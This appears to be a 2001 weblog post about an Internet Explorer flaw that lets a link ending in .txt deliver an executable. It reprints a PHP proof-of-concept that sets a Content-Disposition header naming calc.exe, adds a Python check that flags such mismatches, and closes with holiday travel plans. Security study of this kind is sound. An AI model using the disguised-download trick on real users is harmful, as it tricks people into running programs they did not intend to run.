December 12th, 2001


HUGE security weakness in Internet Explorer

Looks like Internet Explorer has a bug in it that is so wide you can drive a truck through it. Imagine clicking on what seems to be a standard HTML link in IE and having it execute a program on your computer... the file extension in the link could be anything - readme.txt, robot.wav, index.html ... ouch.

Apparently, a PHP exploit was published on Bugtraq more than a week ago that demonstrates the vulnerability. The trick is that the server answers a request for a harmless-looking URL with a Content-Disposition header naming an executable, and IE goes by that name rather than by the .txt in the URL (the web server does have to be configured to run .txt files through PHP for the demo below to work):

1. Copy the real Windows calc.exe from a Windows system to the HTML root dir.

2. Copy the readme.txt file below to the same HTML root dir.

3. Go to the URL http://yourserver/readme.txt

You will see the same behavior mentioned in the previous alert.

FILE <readme.txt> BEGIN ----
<?php
Header("Content-type: application/octet-stream");             // generic binary: IE ignores the .txt in the URL
Header("Content-Disposition: attachment; filename=calc.exe"); // and takes the file name (and so the type) from here
readfile("calc.exe"); // body is the real calc.exe from step 1; no closing ?> so no stray newline follows the binary
FILE <readme.txt> END ----
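For anyone who would rather catch this on the wire than wait for Microsoft, here is a small added example (my own code, not the Bugtraq exploit and not anything from Microsoft) of the check a filtering proxy or download tool could apply: compare the extension in the URL with the file name the Content-Disposition header asks the browser to use, and refuse the download when a harmless-looking URL turns into an executable. The function names, the list of executable extensions and the sample responses are all assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote

# Extensions Windows will run directly when the downloaded file is "opened".
# Assumed list for this example; extend it for your environment.
EXECUTABLE_EXTENSIONS = {"exe", "com", "bat", "cmd", "pif", "scr", "vbs", "js", "hta", "lnk"}

_FILENAME_RE = re.compile(r'filename\s*=\s*(?:"([^"]*)"|([^;\s]+))', re.IGNORECASE)


def header(headers, name):
    """Case-insensitive header lookup over a plain dict."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def content_disposition_filename(value):
    """Pull the filename= parameter out of a Content-Disposition value.
    Quoted and bare forms are handled; directory parts (../ or ..\\) are dropped
    so a smuggled path cannot change the answer. The RFC 5987 filename*= form
    is deliberately not handled here."""
    if not value:
        return None
    m = _FILENAME_RE.search(value)
    if not m:
        return None
    name = m.group(1) if m.group(1) is not None else m.group(2)
    return name.replace("\\", "/").rsplit("/", 1)[-1]


def extension(name):
    """Lower-cased extension of a file name, or "" if it has none."""
    if not name or "." not in name:
        return ""
    return name.rsplit(".", 1)[1].lower()


def check_download(url, headers):
    """Compare what the URL promises with what the server tells the browser to save.
    Returns (verdict, reason) with verdict in {"ok", "suspicious", "block"}."""
    url_name = unquote(urlsplit(url).path.rsplit("/", 1)[-1])
    url_ext = extension(url_name)
    cd_name = content_disposition_filename(header(headers, "Content-Disposition"))
    if cd_name is None:
        return "ok", "no Content-Disposition filename; name comes from the URL (%s)" % url_name
    cd_ext = extension(cd_name)
    if cd_ext == url_ext:
        return "ok", "URL and Content-Disposition agree on .%s" % cd_ext
    if cd_ext in EXECUTABLE_EXTENSIONS:
        return "block", "URL says %r but server wants it saved as executable %r" % (url_name, cd_name)
    if url_ext == "":
        return "ok", "dynamic URL (no extension) naming a non-executable file %r" % cd_name
    return "suspicious", "extension mismatch: URL %r vs Content-Disposition %r" % (url_name, cd_name)


# Constructed sample responses (not captured traffic); the first is the readme.txt trick above.
SAMPLE_RESPONSES = [
    ("http://yourserver/readme.txt",
     {"Content-Type": "application/octet-stream",
      "Content-Disposition": "attachment; filename=calc.exe"}),
    ("http://yourserver/index.html",
     {"content-type": "application/octet-stream",
      "content-disposition": 'attachment; filename="..\\..\\calc.exe"'}),
    ("http://yourserver/setup.exe",
     {"Content-Type": "application/octet-stream",
      "Content-Disposition": "attachment; filename=setup.exe"}),
    ("http://yourserver/download?id=7",
     {"Content-Type": "application/pdf",
      "Content-Disposition": "attachment; filename=report.pdf"}),
    ("http://yourserver/photo.jpg",
     {"Content-Type": "image/gif",
      "Content-Disposition": "inline; filename=photo.gif"}),
    ("http://yourserver/robot.wav",
     {"Content-Type": "audio/x-wav"}),
]


def run_samples():
    """Run the check over SAMPLE_RESPONSES and return the list of verdicts."""
    return [check_download(url, hdrs)[0] for url, hdrs in SAMPLE_RESPONSES]


if __name__ == "__main__":
    for (url, hdrs), verdict in zip(SAMPLE_RESPONSES, run_samples()):
        print("%-10s %s" % (verdict, check_download(url, hdrs)[1]))
```

The check is deliberately lenient for URLs with no extension at all (download scripts routinely name their output in the header), and strict the moment the header turns a non-executable URL into an executable name; the path-stripping in the filename parser matters, since a browser or proxy that kept "..\..\calc.exe" whole would be tricked by the path as well as the extension.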

Unfortunately, Microsoft doesn't consider this a vulnerability; they say that the trust decision should be based on the file source and not type. Who can you trust? Hm... that's a hard one, considering that even reputable commercial software vendors have been (accidentally) guilty of distributing virii along with their software... and can you really trust any link on any personal site (such as a journal, weblog, etc.)? Unfortunately, this bug is so sweeping that the issue stops being a matter of trust and becomes a matter of blind faith that we won't be the ones affected. Does this mean that your "friends" can be infected by a virus that will email you with friendly banter and tell you to check out an innocuous-looking link with a "safe" file extension?!

What Microsoft is really asking you to do is trust no one - except them. They refuse to see their great contribution to making the Internet such a dangerous place to be... meanwhile, virii that primarily target their software's security flaws routinely cost people billions of dollars a year.

Until Microsoft starts taking security a lot more seriously and stops pushing the responsibility entirely back on the user, there is only one simple solution to this bug - don't use IE anymore.

Travel Travails

Looks like Kirsten and I will be going up to Portland, OR for Dec. 22nd-26th... but I have the great majority of that time free and I don't know what to do with it.

I was thinking about a road trip to Seattle, coming back on the 25th. Also would like to meet a lot of people, but if I named them all, it would be too much like watching Romper Room.

"Romper stomper bomper boo!
Tell me tell me tell me who!
I look into my mirror and who do I see?
Celestina and Arianna and Kill and..."

So, some of you live in that general area... you know the place. You even know my interests. What should I do when I'm up there? Who should I do it with? Here's your big chance to plan my itinerary for me!